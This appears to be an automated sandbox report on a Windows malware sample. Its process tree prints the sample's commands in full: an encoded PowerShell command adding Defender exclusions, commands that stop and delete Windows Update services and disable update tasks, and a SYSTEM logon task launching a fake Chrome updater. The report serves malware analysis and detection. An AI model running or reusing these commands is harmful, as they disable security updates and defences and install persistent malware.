Analysis
-
max time kernel
46s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17-08-2022 22:16
Static task
static1
Behavioral task
behavioral1
Sample
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
Resource
win7-20220812-en
General
-
Target
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
-
Size
1.8MB
-
MD5
6691c3106d5319f108114a48f5177396
-
SHA1
1ce92f03b5e7bd1c1d591141693f6e0261f3afee
-
SHA256
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97
-
SHA512
19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 576 takeown.exe 772 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 576 takeown.exe 772 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
Processes:
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 572 sc.exe 1924 sc.exe 1516 sc.exe 1324 sc.exe 1588 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1652 reg.exe 832 reg.exe 108 reg.exe 860 reg.exe 976 reg.exe 1636 reg.exe 1764 reg.exe 1544 reg.exe 1012 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exe375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exepid process 1740 powershell.exe 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exe375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exetakeown.exedescription pid process Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe Token: SeTakeOwnershipPrivilege 576 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.execmd.execmd.execmd.exedescription pid process target process PID 1680 wrote to memory of 1740 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe powershell.exe PID 1680 wrote to memory of 1740 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe powershell.exe PID 1680 wrote to memory of 1740 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe powershell.exe PID 1680 wrote to memory of 1292 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1292 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1292 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1292 wrote to memory of 572 1292 cmd.exe sc.exe PID 1292 wrote to memory of 572 1292 cmd.exe sc.exe PID 1292 wrote to memory of 572 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1924 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1924 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1924 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1516 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1516 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1516 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1324 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1324 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1324 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1588 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1588 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1588 1292 cmd.exe sc.exe PID 1292 wrote to memory of 1764 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1764 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1764 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1652 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1652 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1652 1292 cmd.exe reg.exe PID 1292 wrote to memory of 832 1292 cmd.exe reg.exe PID 1292 wrote to memory of 832 1292 cmd.exe reg.exe PID 1292 wrote to memory of 832 1292 cmd.exe reg.exe PID 1292 wrote to memory of 108 1292 cmd.exe reg.exe PID 1292 wrote to memory of 108 1292 cmd.exe reg.exe PID 1292 wrote to memory of 108 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1544 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1544 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1544 1292 cmd.exe reg.exe PID 1292 wrote to memory of 576 1292 cmd.exe takeown.exe PID 1292 wrote to memory of 576 1292 cmd.exe takeown.exe PID 1292 wrote to memory of 576 1292 cmd.exe takeown.exe PID 1292 wrote to memory of 772 1292 cmd.exe icacls.exe PID 1292 wrote to memory of 772 1292 cmd.exe icacls.exe PID 1292 wrote to memory of 772 1292 cmd.exe icacls.exe PID 1680 wrote to memory of 1304 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1304 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1304 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1700 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1700 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1680 wrote to memory of 1700 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe cmd.exe PID 1304 wrote to memory of 1952 1304 cmd.exe schtasks.exe PID 1304 wrote to memory of 1952 1304 cmd.exe schtasks.exe PID 1304 wrote to memory of 1952 1304 cmd.exe schtasks.exe PID 1700 wrote to memory of 1168 1700 cmd.exe schtasks.exe PID 1700 wrote to memory of 1168 1700 cmd.exe schtasks.exe PID 1700 wrote to memory of 1168 1700 cmd.exe schtasks.exe PID 1292 wrote to memory of 860 1292 cmd.exe reg.exe PID 1292 wrote to memory of 860 1292 cmd.exe reg.exe PID 1292 wrote to memory of 860 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1012 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1012 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1012 1292 cmd.exe reg.exe PID 1292 wrote to memory of 976 1292 cmd.exe reg.exe PID 1292 wrote to memory of 976 1292 cmd.exe reg.exe PID 1292 wrote to memory of 976 1292 cmd.exe reg.exe PID 1292 wrote to memory of 1636 1292 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe"C:\Users\Admin\AppData\Local\Temp\375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/108-72-0x0000000000000000-mapping.dmp
-
memory/480-86-0x0000000000000000-mapping.dmp
-
memory/572-64-0x0000000000000000-mapping.dmp
-
memory/576-74-0x0000000000000000-mapping.dmp
-
memory/772-75-0x0000000000000000-mapping.dmp
-
memory/832-71-0x0000000000000000-mapping.dmp
-
memory/860-80-0x0000000000000000-mapping.dmp
-
memory/904-84-0x0000000000000000-mapping.dmp
-
memory/976-82-0x0000000000000000-mapping.dmp
-
memory/1012-81-0x0000000000000000-mapping.dmp
-
memory/1168-79-0x0000000000000000-mapping.dmp
-
memory/1204-90-0x0000000000000000-mapping.dmp
-
memory/1292-63-0x0000000000000000-mapping.dmp
-
memory/1304-76-0x0000000000000000-mapping.dmp
-
memory/1312-87-0x0000000000000000-mapping.dmp
-
memory/1324-67-0x0000000000000000-mapping.dmp
-
memory/1504-88-0x0000000000000000-mapping.dmp
-
memory/1516-66-0x0000000000000000-mapping.dmp
-
memory/1544-73-0x0000000000000000-mapping.dmp
-
memory/1588-68-0x0000000000000000-mapping.dmp
-
memory/1620-85-0x0000000000000000-mapping.dmp
-
memory/1636-83-0x0000000000000000-mapping.dmp
-
memory/1652-70-0x0000000000000000-mapping.dmp
-
memory/1680-54-0x000000013F110000-0x000000013F2EE000-memory.dmpFilesize
1.9MB
-
memory/1680-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmpFilesize
8KB
-
memory/1700-77-0x0000000000000000-mapping.dmp
-
memory/1712-89-0x0000000000000000-mapping.dmp
-
memory/1740-56-0x0000000000000000-mapping.dmp
-
memory/1740-59-0x000007FEEC840000-0x000007FEED39D000-memory.dmpFilesize
11.4MB
-
memory/1740-61-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1740-60-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1740-62-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1740-58-0x000007FEED3A0000-0x000007FEEDDC3000-memory.dmpFilesize
10.1MB
-
memory/1764-69-0x0000000000000000-mapping.dmp
-
memory/1924-65-0x0000000000000000-mapping.dmp
-
memory/1952-78-0x0000000000000000-mapping.dmp